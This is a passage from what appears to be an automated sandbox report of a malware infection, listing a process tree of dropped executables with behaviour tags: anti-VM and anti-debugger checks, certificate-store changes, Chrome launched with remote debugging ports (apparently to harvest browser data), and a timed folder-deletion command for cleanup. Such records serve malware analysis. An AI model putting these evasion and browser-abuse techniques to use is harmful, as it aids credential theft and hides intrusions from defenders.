        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4264 --field-trial-handle=1288,i,10730496149954833819,3462560615265395091,131072 /prefetch:8
        9⤵
        
        PID:3864
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="System Profile"
        8⤵
        Uses browser remote debugging
        
        PID:1664
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6569758,0x7fef6569768,0x7fef6569778
        9⤵
        
        PID:4060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1384,i,12664834630296775023,1392275473552775835,131072 /prefetch:2
        9⤵
        
        PID:2192
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=1384,i,12664834630296775023,1392275473552775835,131072 /prefetch:8
        9⤵
        
        PID:2860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1384,i,12664834630296775023,1392275473552775835,131072 /prefetch:8
        9⤵
        
        PID:1968
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2380 --field-trial-handle=1384,i,12664834630296775023,1392275473552775835,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2024 --field-trial-handle=1384,i,12664834630296775023,1392275473552775835,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3976
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2192 --field-trial-handle=1384,i,12664834630296775023,1392275473552775835,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3476 --field-trial-handle=1384,i,12664834630296775023,1392275473552775835,131072 /prefetch:2
        9⤵
        
        PID:2480
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\aiw4e" & exit
        8⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        9⤵
        Delays execution with timeout.exe
        
        PID:3820
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 504
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:1860
      - C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:900
      - C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:992
      - C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2712
        
        C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1948
      - C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef23b9758,0x7fef23b9768,0x7fef23b9778
        8⤵
        
        PID:3004
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:1812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1364,i,692122366606082322,8283187264483029687,131072 /prefetch:2
        8⤵
        
        PID:3020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1364,i,692122366606082322,8283187264483029687,131072 /prefetch:8
        8⤵
        
        PID:892
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1604 --field-trial-handle=1364,i,692122366606082322,8283187264483029687,131072 /prefetch:8
        8⤵
        
        PID:3032
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2036 --field-trial-handle=1364,i,692122366606082322,8283187264483029687,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2428 --field-trial-handle=1364,i,692122366606082322,8283187264483029687,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2952
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2468 --field-trial-handle=1364,i,692122366606082322,8283187264483029687,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1356
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1464 --field-trial-handle=1364,i,692122366606082322,8283187264483029687,131072 /prefetch:2
        8⤵
        
        PID:3200
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:3700
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef23b9758,0x7fef23b9768,0x7fef23b9778
        8⤵
        
        PID:3712
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:3824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1084 --field-trial-handle=1272,i,7394536457955076194,1686271919182260609,131072 /prefetch:2
        8⤵
        
        PID:3880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1420 --field-trial-handle=1272,i,7394536457955076194,1686271919182260609,131072 /prefetch:8
        8⤵
        
        PID:3904
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1480 --field-trial-handle=1272,i,7394536457955076194,1686271919182260609,131072 /prefetch:8
        8⤵
        
        PID:3964
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1272,i,7394536457955076194,1686271919182260609,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2432
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2740 --field-trial-handle=1272,i,7394536457955076194,1686271919182260609,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2768 --field-trial-handle=1272,i,7394536457955076194,1686271919182260609,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3132
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1380 --field-trial-handle=1272,i,7394536457955076194,1686271919182260609,131072 /prefetch:2
        8⤵
        
        PID:3600
      - C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Executes dropped EXE
        Identifies Wine through registry keys
        
        PID:3420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:3224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2269758,0x7fef2269768,0x7fef2269778
        8⤵
        
        PID:2760
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:2352
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1364,i,5883518029876893365,6447886166280550808,131072 /prefetch:2
        8⤵
        
        PID:1208
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1364,i,5883518029876893365,6447886166280550808,131072 /prefetch:8
        8⤵
        
        PID:3568
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1364,i,5883518029876893365,6447886166280550808,131072 /prefetch:8
        8⤵
        
        PID:3356
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2248 --field-trial-handle=1364,i,5883518029876893365,6447886166280550808,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2688 --field-trial-handle=1364,i,5883518029876893365,6447886166280550808,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3268
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2704 --field-trial-handle=1364,i,5883518029876893365,6447886166280550808,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3272
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:2092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2269758,0x7fef2269768,0x7fef2269778
        8⤵
        
        PID:3876
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:2948
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1300,i,7348055344953193856,4137311701923474599,131072 /prefetch:2
        8⤵
        
        PID:1188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1300,i,7348055344953193856,4137311701923474599,131072 /prefetch:8
        8⤵
        
        PID:1056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1300,i,7348055344953193856,4137311701923474599,131072 /prefetch:8
        8⤵
        
        PID:2056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2368 --field-trial-handle=1300,i,7348055344953193856,4137311701923474599,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2136 --field-trial-handle=1300,i,7348055344953193856,4137311701923474599,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2516
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2148 --field-trial-handle=1300,i,7348055344953193856,4137311701923474599,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:3268
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2269758,0x7fef2269768,0x7fef2269778
        8⤵
        
        PID:2704
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:2756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1284,i,2882902082204120376,16672865804061096781,131072 /prefetch:2
        8⤵
        
        PID:3384
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1284,i,2882902082204120376,16672865804061096781,131072 /prefetch:8
        8⤵
        
        PID:3188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1284,i,2882902082204120376,16672865804061096781,131072 /prefetch:8
        8⤵
        
        PID:3724
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2288 --field-trial-handle=1284,i,2882902082204120376,16672865804061096781,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2764 --field-trial-handle=1284,i,2882902082204120376,16672865804061096781,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2868 --field-trial-handle=1284,i,2882902082204120376,16672865804061096781,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1400
        7⤵
        Program crash
        
        PID:1952
      - C:\Users\Admin\AppData\Local\Temp\10110300101\22c1fa3933.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110300101\22c1fa3933.exe"
        6⤵
        
        PID:1780
      - C:\Users\Admin\AppData\Local\Temp\10110310101\c07bc18ca6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110310101\c07bc18ca6.exe"
        6⤵
        
        PID:3804
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        7⤵
        
        PID:1980
      - C:\Users\Admin\AppData\Local\Temp\10110320101\7ef698cfba.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110320101\7ef698cfba.exe"
        6⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\10110320101\7ef698cfba.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110320101\7ef698cfba.exe"
        7⤵
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\10110320101\7ef698cfba.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110320101\7ef698cfba.exe"
        7⤵
        
        PID:828
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 1028
        8⤵
        Program crash
        
        PID:2096
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 516
        7⤵
